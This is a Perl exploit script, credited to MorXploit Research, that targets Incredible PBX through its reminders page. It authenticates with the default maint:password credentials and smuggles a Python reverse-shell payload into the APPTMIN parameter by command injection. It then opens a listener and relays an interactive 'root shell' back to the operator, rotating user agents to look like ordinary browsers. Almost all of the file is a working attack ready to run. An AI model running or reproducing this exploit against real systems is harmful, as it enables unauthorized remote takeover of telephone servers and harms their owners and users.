#!/usr/bin/perl
use LWP::UserAgent;
use MIME::Base64;
use IO:: Socket ;
use strict;
sub banner {
system (($^O eq 'MSWin32' ) ? 'cls' : 'clear' );
print "====================================================\n" ;
print "--- Incredible PBX remote command execution exploit\n" ;
print "--- By: Simo Ben youssef <simo_at_morxploit_com>\n" ;
print "--- MorXploit Research www.MorXploit.com\n" ;
print "====================================================\n" ;
}
if (! defined ( $ARGV [0] && $ARGV [1] && $ARGV [2])) {
banner();
print "perl $0 <target> <connectbackIP> <connectbackport>\n" ;
exit ;
}
my $host = $ARGV [0];
my $vuln = "reminders/index.php" ;
my $cbhost = $ARGV [1];
my $cbport = $ARGV [2];
my $defuser = "maint" ;
my $defpass = "password" ;
my $string = "$defuser:$defpass" ;
my $encoded = encode_base64( $string );
$| = 1;
$SIG {CHLD} = 'IGNORE' ;
my $l_sock = IO:: Socket ::INET->new(
Proto => "tcp" ,
LocalPort => "$cbport" ,
Listen => 1,
LocalAddr => "0.0.0.0" ,
Reuse => 1,
) or die "[-] Could not listen on $cbport: $!\n" ;
sub randomagent {
my @array = ( 'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0' ,
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0' ,
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)' ,
'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36' ,
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36' ,
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'
);
my $random = $array [ rand @array ];
return ( $random );
}
my $useragent = randomagent();
my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
$ua ->timeout(10);
$ua ->agent( $useragent );
my $status = $ua ->get( "$host/$vuln" , Authorization => "Basic $encoded" );
unless ( $status ->is_success) {
banner();
print "[-] Error: " . $status ->status_line . "\n" ;
exit ;
}
banner();
print "[*] MorXploiting $host/$vuln\n" ;
my $payload = "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"$cbhost\",$cbport));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" ;
my $get = "APPTDA=morx&APPTPHONE=morx&APPTMO=morx&APPTMIN=;$payload;&APPTHR=morx" ;
my $exploit = $ua ->get( "$host/$vuln?$get" , Authorization => "Basic $encoded" );
print "[+] Sent payload! Waiting for connect back root shell ...\n" ;
my $a_sock = $l_sock -> accept ();
$l_sock -> shutdown (SHUT_RDWR);
copy_data_bidi( $a_sock );
sub copy_data_bidi {
my ( $socket ) = @_ ;
my $child_pid = fork ();
if (! $child_pid ) {
close (STDIN);
copy_data_mono( $socket , *STDOUT);
$socket -> shutdown (SHUT_RD);
exit ();
} else {
close (STDOUT);
copy_data_mono(*STDIN, $socket );
$socket -> shutdown (SHUT_WR);
kill ( "TERM" , $child_pid );
}
}
sub copy_data_mono {
my ( $src , $dst ) = @_ ;
my $buf ;
while ( my $read_len = sysread ( $src , $buf , 4096)) {
my $write_len = $read_len ;
while ( $write_len ) {
my $written_len = syswrite ( $dst , $buf );
return unless $written_len ;
$write_len -= $written_len ;
}
}
}
|